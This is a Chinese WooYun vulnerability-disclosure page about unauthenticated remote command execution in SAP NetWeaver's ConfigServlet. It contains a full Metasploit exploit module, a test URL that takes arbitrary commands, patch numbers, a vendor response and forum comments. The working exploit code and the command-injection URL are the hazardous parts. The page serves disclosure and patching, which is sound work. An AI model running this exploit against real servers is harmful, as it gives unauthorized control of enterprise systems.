当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022140

漏洞标题:用一个案例说明 SAP NETWEAVER 远程命令执行漏洞的利用与影响

相关厂商:hmel

漏洞作者: cnbird

提交时间:2013-04-19 15:15

修复时间:2013-04-23 18:42

公开时间:2013-04-23 18:42

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-19: 细节已通知厂商并且等待厂商处理中
2013-04-23: 厂商已经确认,细节仅向厂商公开
2013-04-23: 厂商提前公开漏洞,细节向公众公开

简要描述:

SAP NetWeaver 是基于专业标准的集成化应用平台,能够大幅度降低系统整合的复杂性。其组件包括门户、应用服务器、商务智能解决方案以及系统整合和数据整合技术。
本次用一个案例说明 SAP NETWEAVER 远程命令执行漏洞的利用与影响。

详细说明:

SAP NetWeaver 是基于专业标准的集成化应用平台,能够大幅度降低系统整合的复杂性。其组件包括门户、应用服务器、商务智能解决方案以及系统整合和数据整合技术。
EXP from:
http://packetstormsecurity.com/files/121355/sapconfigservlet-exec.rb.txt

require 'msf/core'
class Metasploit3 < Msf::Auxiliary
    include Msf::Exploit::Remote::HttpClient
    include Msf::Auxiliary::Scanner
 
    def initialize(info = {})
        super(update_info(info,
            'Name'            => 'SAP ConfigServlet OS command execution',
            'Description'     => %q{
                    This module allows execution of operating system commands through
                the SAP ConfigServlet without any authentication.
            },
            'Author'          =>
                [
                    'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)
                    'Andras Kabai', # Metasploit module
                ],
            'License'         => MSF_LICENSE,
            'References'      =>
                [
                    [ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf'],
                ],
            'DisclosureDate' => 'Nov 01 2012' # Based on the reference presentation
            ))
 
        register_options(
            [
                Opt::RPORT(50000),
                OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
                OptString.new('PATH', [ true, 'Path to ConfigServlet ', '/ctc/servlet/ConfigServlet']),
                OptBool.new('SSL', [true, 'Use SSL', false])
            ], self.class)
    end
 
    def run_host(ip)
        begin
            print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
            res = send_request_cgi(
                {
                    'uri'    => datastore['PATH'] + '?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(datastore['CMD']),
                    'method' => 'GET',
                })
            if !res or res.code != 200
                print_error("#{rhost}:#{rport} - Exploit failed.")
                return
            end
        rescue ::Rex::ConnectionError
            print_error("#{rhost}:#{rport} - Failed to connect to the server")
            return
        end
 
        if res.body.include?("Process created")
            print_good("#{rhost}:#{rport} - Exploited successfully\n")
            print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
            print_line("#{rhost}:#{rport} - Output: #{res.body}")
        else
            print_error("#{rhost}:#{rport} - Exploit failed.")
            vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
        end
    end
end


测试方法:/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=[command]

漏洞证明:

hmel.jpg

修复方案:

联系SAP专业厂家,已经发了补丁了
打如下两个补丁即可
SAP 1467771,
SAP 1445998

版权声明:转载请注明来源 cnbird@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-04-23 18:25

厂商回复:

对于SAP新近披露的远程代码执行漏洞,CNVD仍然在对相关案例进行测试中。先行确认所述情况,互联网上已经披露,案例已经打码,可以提前公开。
按通用软件漏洞进行评分,rank 10

最新状态:

2013-04-23:案例打码,可以提前公开,让大家学习。

漏洞评价:

评论

  1. 2013-04-19 15:20 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    大神,将技术,偷过来呀

  2. 2013-04-19 15:20 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    看了洞主的标题吓了一跳,看了洞主的名字才反应过来。。。

  3. 2013-04-19 15:26 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    国际化了

  4. 2013-04-19 15:31 | Metasploit ( 实习白帽子 | Rank:37 漏洞数:7 | http://www.metasploit.cn/)

    ....

  5. 2013-04-19 15:43 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    Canada ?外交洞?

  6. 2013-04-19 15:47 | 虫子 ( 路人 | Rank:5 漏洞数:1 | 小弟也是大学生)

    我擦 卖给沈飞?

  7. 2013-04-19 15:49 | 联众世界(乌云厂商)

    看了洞主的标题吓了一跳,看了洞主的名字才反应过来。。。

  8. 2013-04-19 15:52 | 虫子 ( 路人 | Rank:5 漏洞数:1 | 小弟也是大学生)

    @联众世界 名字怎么了? 是你失散多年的兄弟?

  9. 2013-04-19 15:52 | 毛猴 ( 实习白帽子 | Rank:63 漏洞数:18 | 一 只 怀 有 梦 想 的 猴 ......)

    看亮点啊 大哥 ! 不然查电表啊。

  10. 2013-04-19 16:07 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    看了洞主的标题吓了一跳,看了洞主的名字才反应过来。。。

  11. 2013-04-19 16:08 | jdnehc ( 实习白帽子 | Rank:76 漏洞数:12 )

    看了洞主的标题吓了一跳,看了洞主的名字才反应过来。。。

  12. 2013-04-19 16:11 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    看科普。。。http://www.freebuf.com/news/8782.html

  13. 2013-04-19 16:16 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    @联众世界 求吓一跳原理及其实现方式..

  14. 2013-04-19 16:26 | tojen ( 实习白帽子 | Rank:75 漏洞数:4 )

    鸟哥我日你,撞球呢装呢

  15. 2013-04-19 16:32 | x1aog ( 路人 | Rank:0 漏洞数:1 | 打酱油)

    直接公布得了,还联系,国外厂商

  16. 2013-04-19 17:25 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    目测又有一波企业要悲剧了

  17. 2013-04-19 19:01 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    SAP的东西不符合我朝人治社会。

  18. 2013-04-19 21:05 | HRay ( 普通白帽子 | Rank:196 漏洞数:28 | 018)

    http://www.exploit-db.com/exploits/24963/ 不知道是不是这个

  19. 2013-04-19 21:36 | kindle ( 实习白帽子 | Rank:40 漏洞数:12 | hh)

    @HRay 是这个

  20. 2013-04-20 21:29 | Metasploit ( 实习白帽子 | Rank:37 漏洞数:7 | http://www.metasploit.cn/)

    已经超越了

  21. 2013-04-23 19:58 | LittlePig ( 路人 | Rank:5 漏洞数:2 | </html>)

    万恶的马赛克